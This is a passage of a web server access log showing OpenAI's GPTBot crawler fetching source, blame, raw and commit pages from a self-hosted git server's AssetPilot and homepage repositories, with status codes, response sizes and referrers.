+0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/js/app.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16565] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10451] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22876] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10015] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 74.7.227.38] [Length 15997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15728] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15760] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14271] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html?display=rendered" [Client 74.7.227.38] [Length 14442] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" +[17/Feb/2026:13:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" +[17/Feb/2026:13:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12449] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:31:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16156] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18114] [Gzip 12.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14274] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22844] [Gzip 13.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9507] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11876] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16601] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 23981] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15599] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15600] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 24395] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 24395] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9508] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9510] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" +[17/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/packages" [Client 74.7.227.38] [Length 6402] [Gzip 2.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:13:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" +[17/Feb/2026:13:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=followers" [Client 74.7.227.38] [Length 6369] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:13:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 10161] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" +[17/Feb/2026:13:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 12529] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" +[17/Feb/2026:13:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata" [Client 74.7.227.38] [Length 115948] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/semiyearly" [Client 74.7.227.38] [Length 8594] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 10574] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 74.7.227.38] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:13:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13565] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 